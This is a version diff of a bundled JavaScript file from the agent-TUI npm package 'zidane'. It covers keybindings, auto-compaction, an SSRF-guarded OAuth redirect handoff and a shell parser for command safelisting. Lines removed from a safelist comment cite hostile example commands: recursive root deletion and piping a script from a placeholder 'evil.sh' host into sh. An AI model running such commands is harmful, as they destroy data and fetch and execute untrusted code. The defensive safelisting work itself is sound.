zidane 5.5.5 → 5.6.2

package/dist/{turn-operations-rYyU2Qyq.js → turn-operations-B8ySajUl.js}

@@ -1,17 +1,18 @@
-import { H as previewLine, R as fmtTokens, U as shortId, a as multiEdit, c as grep, d as resolveOldString, f as styleReplacementForVia, i as readFile$1, l as glob, n as createSpawnTool, o as listFiles, t as writeFile$1, u as edit, y as shell } from "./tools-Bbd0Ivwn.js";
-import { s as errorMessage } from "./errors-C5VSakmT.js";
+import { H as previewLine, R as fmtTokens, U as shortId, a as multiEdit, c as grep, d as resolveOldString, f as styleReplacementForVia, i as readFile$1, l as glob, n as createSpawnTool, o as listFiles, t as writeFile$1, u as edit, y as shell } from "./tools-CslsHpKb.js";
+import { c as errorMessage } from "./errors-DdZXnyXE.js";
 import { r as toolResultToText } from "./types-oKPBdCmL.js";
-import { r as normalizeMcpServers } from "./mcp-BE43Viwi.js";
-import { a as discoverSkills } from "./interpolate-Cvjy8gpk.js";
+import { r as normalizeMcpServers } from "./mcp-ngMS0S6N.js";
+import { a as discoverSkills } from "./interpolate-j5V-wcAQ.js";
 import { n as formatTokenUsage } from "./stats-Lc3zL3RM.js";
-import { n as definePreset, t as composePresets } from "./presets-BDvBZuYI.js";
-import { a as writeFileAtomic, i as anthropic, n as openai, r as cerebras, t as openrouter } from "./providers-CsUyN_FJ.js";
+import { n as definePreset, t as composePresets } from "./presets-CTSij3yV.js";
+import { a as writeFileAtomic, i as anthropic, n as openai, r as cerebras, t as openrouter } from "./providers-CaJE2ToS.js";
 import { createRequire } from "node:module";
 import { dirname, isAbsolute, join, posix, relative, resolve, sep } from "node:path";
 import { homedir, tmpdir } from "node:os";
 import { spawn } from "node:child_process";
 import { chmodSync, createReadStream, createWriteStream, existsSync, mkdirSync, mkdtempSync, readFileSync, realpathSync, renameSync, rmSync, statSync, writeFileSync } from "node:fs";
 import { readdir, stat, writeFile } from "node:fs/promises";
+import { Buffer as Buffer$1 } from "node:buffer";
 import { getModel, getModels } from "@mariozechner/pi-ai";
 import { anthropicOAuthProvider, openaiCodexOAuthProvider } from "@mariozechner/pi-ai/oauth";
 import { createHash } from "node:crypto";
@@ -1416,6 +1417,19 @@ function detectAuth(dataDir, registry, env = process.env) {
 * No state. Same inputs → same answer.
 */
 /**
+* Default hysteresis floor for {@link shouldAutoCompact}. After a successful
+* compaction lands, the next compaction is suppressed until input usage
+* grows by at least this fraction of the effective context window beyond
+* the post-compact baseline.
+*
+* `0.1` = 10% of the window. Picked so the immediate post-compact bounce
+* (summary turn + restored attachments + re-emitted system prefix) never
+* re-fires the trigger by itself, but a meaningful chunk of new work
+* (one or two large tool reads) does. Tune via the predicate's
+* `minGrowthFraction` input if a host needs different ergonomics.
+*/
+const AUTO_COMPACT_MIN_GROWTH_FRACTION = .1;
+/**
 * Decide whether auto-compaction should fire for the latest turn.
 *
 * Order of checks is deliberate: cheapest / most common skips first
@@ -1448,6 +1462,12 @@ function shouldAutoCompact(input) {
 		kind: "skip",
 		reason: "under-threshold"
 	};
+	if (typeof input.lastCompactedInputTokens === "number" && Number.isFinite(input.lastCompactedInputTokens) && input.lastCompactedInputTokens >= 0 && typeof input.minGrowthFraction === "number" && Number.isFinite(input.minGrowthFraction) && input.minGrowthFraction > 0) {
+		if ((input.inputTokens - input.lastCompactedInputTokens) / effectiveWindow < input.minGrowthFraction) return {
+			kind: "skip",
+			reason: "cooldown"
+		};
+	}
 	if (input.alreadyCompacting) return {
 		kind: "skip",
 		reason: "already-compacting"
@@ -2942,127 +2962,162 @@ const KEYBINDING_DEFS = [
 		action: "openSettings",
 		default: "ctrl+o",
 		label: "settings",
-		description: "open the Settings modal (toggles, theme, keybindings)"
+		description: "open the Settings modal (toggles, theme, keybindings)",
+		group: "Global"
 	},
 	{
 		action: "openSessionDetails",
 		default: "ctrl+x",
 		label: "session",
-		description: "open the session details modal (stats, export, delete, rename)"
+		description: "open the session details modal (stats, export, delete, rename)",
+		group: "Global"
 	},
 	{
 		action: "openModelPicker",
 		default: "ctrl+m",
 		label: "model",
-		description: "open the cross-provider model picker"
+		description: "open the cross-provider model picker",
+		group: "Global"
 	},
 	{
 		action: "openEffortPicker",
 		default: "ctrl+l",
 		label: "effort",
-		description: "open the reasoning-effort picker (when the active model supports it)"
+		description: "open the reasoning-effort picker (when the active model supports it)",
+		group: "Global"
 	},
 	{
 		action: "openTodos",
 		default: "ctrl+t",
 		label: "todos",
-		description: "open the active run's todo list (the agent's `todowrite` checkpoints)"
+		description: "open the active run's todo list (the agent's `todowrite` checkpoints)",
+		group: "Global"
+	},
+	{
+		action: "openKeybindings",
+		default: "ctrl+y",
+		label: "keybindings",
+		description: "open the keybindings panel — list every shortcut and jump to the keybindings.json file",
+		group: "Global"
 	},
 	{
 		action: "cycleAgent",
 		default: "shift+tab",
 		label: "cycle agent",
-		description: "cycle to the next agent profile (when multiple profiles are registered)"
+		description: "cycle to the next agent profile (when multiple profiles are registered)",
+		group: "Global"
 	},
 	{
 		action: "enterSelectTurnMode",
 		default: "ctrl+s",
 		label: "messages",
-		description: "enter select-turn mode to navigate previous messages"
+		description: "enter select-turn mode to navigate previous messages",
+		group: "Global"
 	},
 	{
 		action: "cancelToolCall",
 		default: "ctrl+k",
 		label: "cancel tool",
-		description: "open the in-flight tool picker to cancel a single tool call without aborting the run (esc still aborts the whole run)"
+		description: "open the in-flight tool picker to cancel a single tool call without aborting the run (esc still aborts the whole run)",
+		group: "Global"
+	},
+	{
+		action: "changeCwd",
+		default: "ctrl+g",
+		label: "cwd",
+		description: "open the directory picker to change the working directory",
+		group: "Global"
 	},
 	{
 		action: "enterQueueSelection",
 		default: "",
 		label: "select queue",
-		description: "move focus from the prompt textarea into the type-ahead queue box (also: ↑ on an empty prompt)"
+		description: "move focus from the prompt textarea into the type-ahead queue box (also: ↑ on an empty prompt)",
+		group: "Message queue"
 	},
 	{
 		action: "pushQueuedMessage",
 		default: "ctrl+return",
 		label: "push",
-		description: "steer the selected queued message into the live run (delivered between tool calls)"
+		description: "steer the selected queued message into the live run (delivered between tool calls)",
+		group: "Message queue"
 	},
 	{
 		action: "dropQueuedMessage",
 		default: "backspace",
 		label: "drop",
-		description: "remove the selected queued message — exits back to the prompt when the queue empties (the big \"remove\" key works everywhere: backspace on Win/Linux, the laptop key labeled \"delete\" on Mac, which sends backspace)"
+		description: "remove the selected queued message — exits back to the prompt when the queue empties (the big \"remove\" key works everywhere: backspace on Win/Linux, the laptop key labeled \"delete\" on Mac, which sends backspace)",
+		group: "Message queue"
 	},
 	{
 		action: "turnFork",
 		default: "f",
 		label: "fork",
-		description: "fork the session at the selected turn (two-press confirm)"
+		description: "fork the session at the selected turn (two-press confirm)",
+		group: "Turn details"
 	},
 	{
 		action: "turnDelete",
 		default: "d",
 		label: "delete",
-		description: "delete the selected turn (two-press confirm)"
+		description: "delete the selected turn (two-press confirm)",
+		group: "Turn details"
 	},
 	{
 		action: "turnCopy",
 		default: "c",
 		label: "copy",
-		description: "copy the selected turn content to the clipboard (OSC 52)"
+		description: "copy the selected turn content to the clipboard (OSC 52)",
+		group: "Turn details"
 	},
 	{
 		action: "turnEdit",
 		default: "e",
 		label: "edit",
-		description: "edit the text content of the selected turn"
+		description: "edit the text content of the selected turn",
+		group: "Turn details"
 	},
 	{
 		action: "sessionDelete",
 		default: "d",
 		label: "delete",
-		description: "delete the entire session (two-press confirm)"
+		description: "delete the entire session (two-press confirm)",
+		group: "Session details"
 	},
 	{
 		action: "sessionCopyId",
 		default: "c",
 		label: "copy id",
-		description: "copy the full session id to the clipboard (OSC 52)"
+		description: "copy the full session id to the clipboard (OSC 52)",
+		group: "Session details"
 	},
 	{
 		action: "sessionGenerateTitle",
 		default: "g",
 		label: "generate title",
-		description: "generate a title for the session via the active provider/model"
+		description: "generate a title for the session via the active provider/model",
+		group: "Session details"
 	},
 	{
 		action: "sessionExportMarkdown",
 		default: "e",
 		label: "export md",
-		description: "export the session as Markdown under .{prefix}/sessions/"
+		description: "export the session as Markdown under .{prefix}/sessions/",
+		group: "Session details"
 	},
 	{
 		action: "sessionExportJson",
 		default: "j",
 		label: "export json",
-		description: "export the session as JSON under .{prefix}/sessions/"
+		description: "export the session as JSON under .{prefix}/sessions/",
+		group: "Session details"
 	},
 	{
 		action: "sessionCompact",
 		default: "k",
 		label: "compact",
-		description: "compact older turns via an LLM summary (model still sees everything from the boundary down)"
+		description: "compact older turns via an LLM summary (model still sees everything from the boundary down)",
+		group: "Session details"
 	}
 ];
 /** Index by action for O(1) lookup of label / description / default. */
@@ -3162,6 +3217,39 @@ function matchesBinding(event, spec) {
 	if ((event.name ?? "").toLowerCase() !== parsed.name) return false;
 	return true;
 }
+/** Verbose key names → compact single-cell glyphs used by hint rows. */
+const KEY_GLYPHS = {
+	up: "↑",
+	down: "↓",
+	left: "←",
+	right: "→",
+	return: "↵",
+	enter: "↵",
+	delete: "⌫",
+	backspace: "⌫",
+	escape: "esc",
+	space: "␣",
+	tab: "⇥"
+};
+/**
+* Render a binding spec (`"ctrl+return"`, `"backspace"`, `"delete"`) as a
+* compact display string the user recognizes at a glance. Substitutes
+* arrow / enter / backspace glyphs for their verbose names so the hint
+* row stays narrow; modifier names + plain keys pass through unchanged.
+*
+* Empty / missing specs return an empty string — callers decide whether
+* to render a placeholder (e.g. `'—'` for an unbound action in the
+* keybindings panel) or hide the surface entirely (e.g. hint rows that
+* fall back to a different chord when the binding is empty).
+*/
+function formatBindingForDisplay(spec) {
+	if (!spec) return "";
+	const segments = spec.toLowerCase().split("+");
+	const key = segments.pop() ?? "";
+	const modifiers = segments.join("+");
+	const glyph = KEY_GLYPHS[key] ?? key;
+	return modifiers ? `${modifiers}+${glyph}` : glyph;
+}
 /**
 * Merge a partial map of user overrides into the defaults. Unknown
 * action keys are dropped (a future TUI version may have retired the
@@ -4281,10 +4369,27 @@ function eventsFromTurns(turns, runs = []) {
 						kind: "separator",
 						text: ""
 					});
+					const attachments = [];
+					for (const sibling of turn.content) if (sibling.type === "image") {
+						const raw = typeof sibling.data === "string" ? Buffer$1.from(sibling.data, "base64") : sibling.data;
+						attachments.push({
+							name: sibling.name ?? "image",
+							mediaType: sibling.mediaType,
+							size: raw.length
+						});
+					} else if (sibling !== block && sibling.type === "text") {
+						const m = sibling.text.match(/^<attachment\s+(?:name="([^"]+)"\s*)?(?:media_type="([^"]+)")?/);
+						if (m) attachments.push({
+							name: m[1] ?? "attachment",
+							mediaType: m[2] ?? "text/plain",
+							size: sibling.text.length
+						});
+					}
 					events.push({
 						kind: "user-prompt",
 						text: block.text,
-						turnId: turn.id
+						turnId: turn.id,
+						...attachments.length > 0 ? { attachments } : {}
 					});
 				}
 			} else if (block.type === "tool_result") {
@@ -5929,7 +6034,8 @@ const DEFAULT_SETTINGS = {
 	smoothStreaming: true,
 	showTodoIndicator: true,
 	showThrobber: false,
-	checkForUpdates: true
+	checkForUpdates: true,
+	uiMode: "full"
 };
 /**
 * Hard-clamp a `targetFps` value to a safe range before handing it to
@@ -6125,6 +6231,18 @@ const SETTINGS_CHOICES = [
 			label: t.label
 		}))
 	},
+	{
+		key: "uiMode",
+		label: "UI mode",
+		description: "chat-screen chrome density — full advertises every shortcut, minimal keeps only agent / model / keybindings + `@` · `/` triggers (rest reachable via `ctrl+y`)",
+		options: [{
+			value: "full",
+			label: "Full"
+		}, {
+			value: "minimal",
+			label: "Minimal"
+		}]
+	},
 	{
 		key: "targetFps",
 		label: "Renderer fps",
@@ -6392,6 +6510,177 @@ function toEntries(paths, source, maxFiles) {
 	return out;
 }
 //#endregion
+//#region src/chat/footer-hints.ts
+/**
+* Build the footer's shortcut hints for the current screen. On the chat
+* screen the model id rides next to its `ctrl+m` shortcut and the agent
+* label rides next to `shift+tab`, each in its accent color — the bar
+* doubles as the status display without needing separate badges. When
+* the active model exposes reasoning, the `ctrl+m` hint grows a
+* secondary `/n` chord with the current effort label, surfacing the
+* effort picker as a discoverable, in-place affordance.
+*/
+function buildHints(options) {
+	const { screen, busy, pending, pendingInteractionLive, pendingInteractionResumed, currentSession, hasMultipleAgents, uiMode, modelLabel, modelColor, effortLabel, effortColor, effortKeyColor, agentLabel, agentColor, keybindings, inFlightToolCount, activeSkillCount, skillsChipColor, updateHint } = options;
+	if (pending) return [
+		{
+			key: "↑↓",
+			label: "navigate"
+		},
+		{
+			key: "↵",
+			label: "select"
+		},
+		{
+			key: "esc",
+			label: "abort run"
+		}
+	];
+	if (pendingInteractionLive) return [
+		{
+			key: "↑↓",
+			label: "navigate"
+		},
+		{
+			key: "↵",
+			label: "select"
+		},
+		{
+			key: "esc",
+			label: "abort run"
+		}
+	];
+	if (pendingInteractionResumed) return [
+		{
+			key: "↑↓",
+			label: "navigate"
+		},
+		{
+			key: "↵",
+			label: "select"
+		},
+		{
+			key: "esc",
+			label: "leave for later"
+		}
+	];
+	if (busy) {
+		const baseBusyHints = [];
+		if (inFlightToolCount > 0) baseBusyHints.push({
+			key: keybindings.cancelToolCall,
+			label: inFlightToolCount === 1 ? "cancel" : `cancel (${inFlightToolCount})`
+		});
+		baseBusyHints.push({
+			key: "esc",
+			label: "abort"
+		});
+		return baseBusyHints;
+	}
+	if (screen === "auth") return [
+		{
+			key: "↑↓",
+			label: "navigate"
+		},
+		{
+			key: "↵",
+			label: "select"
+		},
+		{
+			key: "esc",
+			label: "exit"
+		}
+	];
+	if (screen === "sessions") return [
+		{
+			key: "↑↓",
+			label: "navigate"
+		},
+		{
+			key: "↵",
+			label: "open"
+		},
+		{
+			key: keybindings.openSessionDetails,
+			label: "session"
+		},
+		{
+			key: keybindings.openSettings,
+			label: "settings"
+		},
+		{
+			key: "esc",
+			label: currentSession ? "back" : "exit"
+		}
+	];
+	const modelHint = modelLabel ? {
+		key: keybindings.openModelPicker,
+		label: modelLabel,
+		labelColor: modelColor,
+		...effortLabel ? { extra: {
+			key: shortChord(keybindings.openEffortPicker),
+			keyColor: effortKeyColor,
+			label: effortLabel,
+			labelColor: effortColor
+		} } : {}
+	} : null;
+	const skillsChip = activeSkillCount > 0 ? {
+		key: "✦",
+		keyColor: skillsChipColor,
+		label: activeSkillCount === 1 ? "1 skill" : `${activeSkillCount} skills`,
+		labelColor: skillsChipColor
+	} : null;
+	const cancelTaskChip = inFlightToolCount > 0 ? {
+		key: keybindings.cancelToolCall,
+		label: inFlightToolCount === 1 ? "cancel task" : `cancel task (${inFlightToolCount})`
+	} : null;
+	if (uiMode === "minimal") return [
+		...hasMultipleAgents ? [{
+			key: keybindings.cycleAgent,
+			label: agentLabel,
+			labelColor: agentColor
+		}] : [],
+		...modelHint ? [modelHint] : [],
+		{
+			key: keybindings.openKeybindings,
+			label: "keybindings"
+		}
+	];
+	return [
+		...hasMultipleAgents ? [{
+			key: keybindings.cycleAgent,
+			label: agentLabel,
+			labelColor: agentColor
+		}] : [],
+		...modelHint ? [modelHint] : [],
+		...skillsChip ? [skillsChip] : [],
+		...cancelTaskChip ? [cancelTaskChip] : [],
+		...currentSession ? [{
+			key: keybindings.openSessionDetails,
+			label: "session"
+		}] : [],
+		{
+			key: keybindings.openSettings,
+			label: "settings"
+		},
+		{
+			key: "esc",
+			label: "sessions"
+		},
+		...updateHint ? [updateHint] : []
+	];
+}
+/**
+* Shorten a binding spec for display as a "chord continuation" — the
+* `/n` after `ctrl+m model` in the chat footer. We only strip the
+* `ctrl+` prefix so user-customized chords (`alt+n`, `meta+shift+n`)
+* still render in full. Falls back to the verbatim spec when no
+* `ctrl+` prefix is found, which keeps the visual contract honest:
+* the rendered key always matches the bound trigger.
+*/
+function shortChord(spec) {
+	return spec.startsWith("ctrl+") ? `/${spec.slice(5)}` : spec;
+}
+//#endregion
 //#region src/chat/generate-title.ts
 /** Hard cap on the result length. Anything longer is truncated client-side. */
 const TITLE_MAX_CHARS = 60;
@@ -6527,7 +6816,14 @@ function hintsLength(hints) {
 function hintLength(h) {
 	return h.key.length + 1 + h.label.length + (h.extra ? h.extra.key.length + 1 + h.extra.label.length : 0);
 }
-/** Stable empty list so callers can compare by reference. */
+/**
+* Stable empty list so callers can compare by reference. Exported so
+* any consumer that needs to feed "no primary hints" into the same
+* `clipHintsToWidth` / `renderHintSpans` pipeline (e.g. the TUI's
+* minimal UI mode, where the prompt overlay shows only `@` / `/`
+* triggers) reuses the same frozen array instead of allocating a new
+* one each render.
+*/
 const EMPTY_HINTS = Object.freeze([]);
 /**
 * Return the longest prefix of `hints` whose rendered width fits within
@@ -7566,6 +7862,10 @@ function buildSearchCorpus(provider, model) {
 function supportsOAuth(descriptor) {
 	return descriptor.oauthProvider !== void 0;
 }
+/** True when the provider's OAuth flow needs the user to paste a code back into the TUI (no loopback callback). */
+function oauthUsesManualCodePaste(descriptor) {
+	return descriptor.oauthProvider?.usesCallbackServer === false;
+}
 /**
 * Run the OAuth login flow for a provider.
 *
@@ -7580,9 +7880,9 @@ async function runOAuthLogin(descriptor, options) {
 			options.onUrl(info.url, info.instructions);
 			tryOpenBrowser(info.url);
 		},
-		onPrompt: async () => {
-			if (!options.onCodeRequest) throw new Error("OAuth flow requires manual code input but no handler is wired.");
-			return options.onCodeRequest();
+		onPrompt: async (prompt) => {
+			if (!options.onPrompt) throw new Error(`OAuth provider "${descriptor.label}" requested user input ("${prompt.message}") but no onPrompt handler is wired.`);
+			return options.onPrompt(prompt);
 		},
 		onProgress: options.onProgress,
 		signal: options.signal
@@ -7590,6 +7890,91 @@ async function runOAuthLogin(descriptor, options) {
 	return descriptor.oauthProvider.login(callbacks);
 }
 //#endregion
+//#region src/chat/oauth-redirect.ts
+/**
+* Manual OAuth redirect-URL handoff.
+*
+* Users who run zidane over SSH (or behind a proxy / firewall that blocks
+* loopback) can't have the local browser hit the in-process callback server.
+* They CAN, however, copy the URL their browser was redirected to —
+* `http://127.0.0.1:<port>/callback?code=...&state=...` — and paste it back
+* into the TUI.
+*
+* The trick: that URL IS the callback our local server is listening on. We
+* just `fetch()` it ourselves. The server runs in the same process; the
+* request hits its handler exactly as if a real browser had arrived, the
+* OAuth promise (`waitForCode` for pi-ai providers, `startOAuthCallback` for
+* MCP) resolves through the normal happy path, and the upstream flow
+* continues uninterrupted. No new code path inside the OAuth state machine.
+*
+* Defense in depth: we reject anything that isn't a loopback URL — fetching
+* an arbitrary user-pasted URL from inside the agent process would be a
+* trivial SSRF.
+*/
+const LOOPBACK_HOSTS = new Set([
+	"127.0.0.1",
+	"localhost",
+	"::1",
+	"[::1]"
+]);
+/**
+* Treat `pasted` as a callback-URL paste. Validates it's a loopback URL,
+* fires a GET, returns the status.
+*
+* Throws when:
+*   - `pasted` doesn't parse as a URL.
+*   - The URL host isn't loopback (rejects SSRF).
+*   - The fetch errors out (network, timeout).
+*
+* Returns success/failure for non-2xx responses; the caller decides whether
+* a 4xx is fatal (state mismatch is a 400 the user can retry from).
+*/
+async function fetchOAuthRedirect(pasted, options = {}) {
+	const trimmed = pasted.trim();
+	if (!trimmed) throw new Error("Paste the redirect URL from your browser.");
+	let url;
+	try {
+		url = new URL(trimmed);
+	} catch {
+		throw new Error("That doesn't look like a URL. Paste the full address from your browser.");
+	}
+	const host = url.hostname.replace(/^\[|\]$/g, "");
+	if (!LOOPBACK_HOSTS.has(host)) throw new Error(`Expected a loopback URL (127.0.0.1 / localhost), got "${url.hostname}". The browser should have redirected to a localhost address.`);
+	const timeoutMs = options.timeoutMs ?? 5e3;
+	const ac = new AbortController();
+	const timer = setTimeout(() => ac.abort(), timeoutMs);
+	options.signal?.addEventListener("abort", () => ac.abort(), { once: true });
+	let response;
+	try {
+		response = await fetch(url.toString(), { signal: ac.signal });
+	} catch (err) {
+		if (err.name === "AbortError") throw new Error("No response from the local callback server — was the login already cancelled?");
+		throw new Error(`Could not reach the local callback server: ${err.message}`);
+	} finally {
+		clearTimeout(timer);
+	}
+	const bodyText = await response.text().catch(() => "");
+	return {
+		status: response.status,
+		message: extractMessage(bodyText)
+	};
+}
+/**
+* Pick the most useful one-line message out of the callback server's HTML
+* response. pi-ai uses `<h1>` for the heading; the MCP callback uses
+* a leading `<p>`. We try both, then fall back to a stripped snippet.
+*/
+function extractMessage(html) {
+	if (!html) return void 0;
+	const h1 = /<h1[^>]*>([\s\S]*?)<\/h1>/i.exec(html)?.[1];
+	if (h1) return stripTags(h1).trim() || void 0;
+	const p = /<p[^>]*>([\s\S]*?)<\/p>/i.exec(html)?.[1];
+	if (p) return stripTags(p).trim() || void 0;
+}
+function stripTags(s) {
+	return s.replace(/<[^>]*>/g, "").replace(/&amp;/g, "&").replace(/&lt;/g, "<").replace(/&gt;/g, ">").replace(/&quot;/g, "\"").replace(/&#39;/g, "'");
+}
+//#endregion
 //#region src/chat/path-display.ts
 /**
 * @-completion path display formatter.
@@ -7702,6 +8087,248 @@ function splitPromptSegments(text, refs) {
 	return out;
 }
 //#endregion
+//#region src/chat/shell-parse.ts
+/**
+* Lightweight shell command parser for safelist enforcement.
+*
+* Extracts the head token (program name) of every command in a bash
+* command string — including chains (`&&`, `||`, `;`), pipes (`|`),
+* subshells (`(…)`), and command substitutions (`$(…)` and backticks).
+*
+* Handles quoting (`'…'`, `"…"`, `\x`), variable assignments
+* (`NAME=val`), I/O redirection, and the `!` negation prefix.
+*
+* Returns `null` when parsing fails so callers can fall back to
+* prompting (safe default).
+*/
+function extractCommandHeads(command) {
+	try {
+		const p = new ShellParser(command);
+		p.list();
+		return p.heads;
+	} catch {
+		return null;
+	}
+}
+const META = new Set(" 	\n\r;|&()<>".split(""));
+var ShellParser = class ShellParser {
+	s;
+	heads = [];
+	i = 0;
+	constructor(s) {
+		this.s = s;
+	}
+	/** Command list — pipelines separated by `;`, `&&`, `||`, `\n`, `&`. */
+	list(closer) {
+		for (;;) {
+			this.ws();
+			if (this.end(closer)) return;
+			this.pipeline(closer);
+			this.ws();
+			if (this.end(closer)) return;
+			const c = this.c();
+			if (c === ";" || c === "\n" || c === "\r") {
+				this.i++;
+				continue;
+			}
+			if (this.is("&&") || this.is("||")) {
+				this.i += 2;
+				continue;
+			}
+			if (c === "&") {
+				this.i++;
+				continue;
+			}
+			break;
+		}
+	}
+	/** Pipeline — simple commands separated by `|` (not `||`). */
+	pipeline(closer) {
+		this.cmd(closer);
+		for (;;) {
+			this.ws();
+			if (this.c() === "|" && !this.is("||")) {
+				this.i++;
+				this.cmd(closer);
+			} else break;
+		}
+	}
+	/** Simple command — extract head, skip remaining arguments. */
+	cmd(closer) {
+		this.ws();
+		if (this.i >= this.s.length) return;
+		if (closer && this.c() === closer) return;
+		if (this.c() === "(") {
+			this.i++;
+			this.list(")");
+			return;
+		}
+		if (this.c() === "!" && this.i + 1 < this.s.length && (this.s[this.i + 1] === " " || this.s[this.i + 1] === "	")) {
+			this.i++;
+			this.ws();
+		}
+		while (this.i < this.s.length && !this.sep(closer)) {
+			if (this.c() === "(") {
+				this.i++;
+				this.list(")");
+				break;
+			}
+			const w = this.word();
+			if (!w) break;
+			if (isAssignment(w)) {
+				this.ws();
+				continue;
+			}
+			this.heads.push(w);
+			break;
+		}
+		this.tail(closer);
+	}
+	/** Read one shell word, handling quoting and substitutions. */
+	word() {
+		let out = "";
+		while (this.i < this.s.length) {
+			const c = this.c();
+			if (META.has(c)) break;
+			if (c === "\\" && this.i + 1 < this.s.length) {
+				out += this.s[this.i + 1];
+				this.i += 2;
+				continue;
+			}
+			if (c === "'") {
+				this.i++;
+				while (this.i < this.s.length && this.s[this.i] !== "'") out += this.s[this.i++];
+				if (this.i < this.s.length) this.i++;
+				continue;
+			}
+			if (c === "\"") {
+				out += this.dquote();
+				continue;
+			}
+			if (this.is("$(")) {
+				this.i += 2;
+				this.list(")");
+				continue;
+			}
+			if (c === "`") {
+				this.btick();
+				continue;
+			}
+			out += c;
+			this.i++;
+		}
+		return out;
+	}
+	/** Double-quoted string — returns literal chars, recurses into substitutions. */
+	dquote() {
+		this.i++;
+		let out = "";
+		while (this.i < this.s.length && this.s[this.i] !== "\"") {
+			if (this.s[this.i] === "\\" && this.i + 1 < this.s.length) {
+				out += this.s[this.i + 1];
+				this.i += 2;
+				continue;
+			}
+			if (this.is("$(")) {
+				this.i += 2;
+				this.list(")");
+				continue;
+			}
+			if (this.s[this.i] === "`") {
+				this.btick();
+				continue;
+			}
+			out += this.s[this.i++];
+		}
+		if (this.i < this.s.length) this.i++;
+		return out;
+	}
+	/** Backtick substitution — creates a sub-parser for the inner content. */
+	btick() {
+		this.i++;
+		const close = this.s.indexOf("`", this.i);
+		const sub = new ShellParser(close < 0 ? this.s.slice(this.i) : this.s.slice(this.i, close));
+		sub.list();
+		this.heads.push(...sub.heads);
+		this.i = close < 0 ? this.s.length : close + 1;
+	}
+	/** Skip remaining arguments and redirections until the next command boundary. */
+	tail(closer) {
+		while (this.i < this.s.length) {
+			this.ws();
+			if (this.i >= this.s.length || this.sep(closer)) break;
+			if (this.redir()) continue;
+			if (this.c() === "(") {
+				this.i++;
+				this.list(")");
+				continue;
+			}
+			if (!this.word()) break;
+		}
+	}
+	/** Try to consume an I/O redirection operator + target. Returns true if consumed. */
+	redir() {
+		const c = this.c();
+		let yes = c === "<" || c === ">";
+		if (!yes && c >= "0" && c <= "9" && this.i + 1 < this.s.length) {
+			const n = this.s[this.i + 1];
+			yes = n === "<" || n === ">";
+		}
+		if (!yes) return false;
+		while (this.i < this.s.length && this.s[this.i] >= "0" && this.s[this.i] <= "9") this.i++;
+		if (this.c() === ">") {
+			this.i++;
+			if (this.c() === ">") this.i++;
+			if (this.c() === "&") {
+				this.i++;
+				while (this.i < this.s.length && this.s[this.i] >= "0" && this.s[this.i] <= "9") this.i++;
+				return true;
+			}
+		} else if (this.c() === "<") {
+			this.i++;
+			if (this.c() === "<") {
+				this.i++;
+				if (this.c() === "-") this.i++;
+			}
+		}
+		this.ws();
+		this.word();
+		return true;
+	}
+	/** True at a command boundary (`;`, `\n`, `&`, `|`, `)`, or closer). */
+	sep(closer) {
+		const c = this.c();
+		if (c === ";" || c === "\n" || c === "\r" || c === "&" || c === ")") return true;
+		if (c === "|") return true;
+		if (closer && c === closer) return true;
+		return false;
+	}
+	/** True when past end or at closer (closer is consumed). */
+	end(closer) {
+		if (this.i >= this.s.length) return true;
+		if (closer && this.c() === closer) {
+			this.i++;
+			return true;
+		}
+		return false;
+	}
+	c() {
+		return this.s[this.i] ?? "";
+	}
+	is(s) {
+		return this.s.startsWith(s, this.i);
+	}
+	ws() {
+		while (this.i < this.s.length && (this.s[this.i] === " " || this.s[this.i] === "	")) this.i++;
+	}
+};
+/** `NAME=…` where NAME is a valid shell identifier. */
+function isAssignment(w) {
+	const eq = w.indexOf("=");
+	if (eq <= 0) return false;
+	return /^[A-Z_]\w*$/i.test(w.slice(0, eq));
+}
+//#endregion
 //#region src/chat/safe-mode.ts
 /**
 * Safe-mode storage + matching for the TUI.
@@ -7827,66 +8454,23 @@ function primaryArgToken(input) {
 	return primaryArgValue(input).trim().split(/\s+/)[0] ?? "";
 }
 /**
-* Shell features that introduce a SECOND, UNRELATED command into the
-* pipeline — and would silently bypass a `shell:<head>:*` safelist that
-* the user only meant to cover the head program. We block these
-* specifically:
-*
-*   - `;`         — sequence operator (`git status; rm -rf /`)
-*   - `&&` / `||` — and-/or-chains (`git status && curl evil.sh | sh`)
-*   - `\n` / `\r` — multi-line scripts, equivalent to `;`
-*   - `` ` ``     — backtick command substitution (`echo \`rm -rf /\``)
-*   - `$(…)`      — modern command substitution (`echo $(rm -rf /)`)
-*
-* We deliberately do NOT block:
-*
-*   - `|`         — pipes; required for the bread-and-butter CLI pattern
-*                   `sentry issue list … | jq -r '.[]'`.
-*   - `>` / `>>` / `<` / `2>&1` — I/O redirection; `cmd > out.txt` and
-*                   `cmd 2>&1 | jq` are normal CLI usage.
-*   - `&` (alone) — backgrounding; runs the same command in the background
-*                   rather than chaining a new one.
-*   - `(…)`       — subshells; rare in practice, and the chaining
-*                   detectors above already catch the dangerous content
-*                   that would typically live inside them.
-*
-* Trade-off: a model that controls the output of the safelisted head
-* command could in principle pipe garbage into a destructive tool
-* (`sentry list | sh`). The original implementation blocked all
-* metacharacters to avoid that risk, but it made `shell:<head>:*`
-* unusable for real CLI workflows — users hit the prompt on every
-* `cmd | jq` and learned to ignore the modal. Allowing pipes/redirects
-* trusts the user's explicit "I want everything starting with <head>"
-* decision; the chaining rejections above keep the obvious escape
-* hatches closed.
-*
-* The regex is intentionally generous: false positives (e.g. a literal
-* `&&` inside a quoted argument) just prompt the user again, which is
-* the safe failure mode.
-*/
-const SHELL_CHAINING_RE = /&&|\|\||\$\(|[;`\n\r]/;
-function hasShellChaining(command) {
-	return SHELL_CHAINING_RE.test(command);
-}
-/**
 * Test whether a `{ tool, input }` pair is covered by one safelist entry.
 *
 * Supported entry shapes:
-*   - `"<tool>"` — broad match on tool name. For `shell`, the command
-*     must not chain through another program (see {@link SHELL_CHAINING_RE}).
+*   - `"<tool>"` — broad match on tool name.
 *   - `"<tool>:<token>:*"` — match when the primary arg's first token
-*     equals `<token>`. For `shell`, same chaining gate as above. Pipes
-*     and redirects are allowed so `shell:sentry:*` covers the typical
-*     `sentry … | jq …` workflow.
+*     equals `<token>`.
+*
+* This function matches a **single command** against a **single entry**.
+* For shell commands that chain multiple programs (`&&`, `||`, `;`,
+* `$(…)`, etc.), use {@link isOnSafelist} which parses the full command
+* and checks every head token independently.
 *
 * Entries that don't fit either shape are ignored (forward-compat for
 * future pattern syntax — readers shouldn't choke on entries written
 * by a newer version of the TUI).
 */
 function matchesSafelistEntry(entry, tool, input) {
-	if (tool === "shell") {
-		if (hasShellChaining(typeof input.command === "string" ? input.command : "")) return false;
-	}
 	if (entry === tool) return true;
 	const sep = entry.indexOf(":");
 	if (sep <= 0) return false;
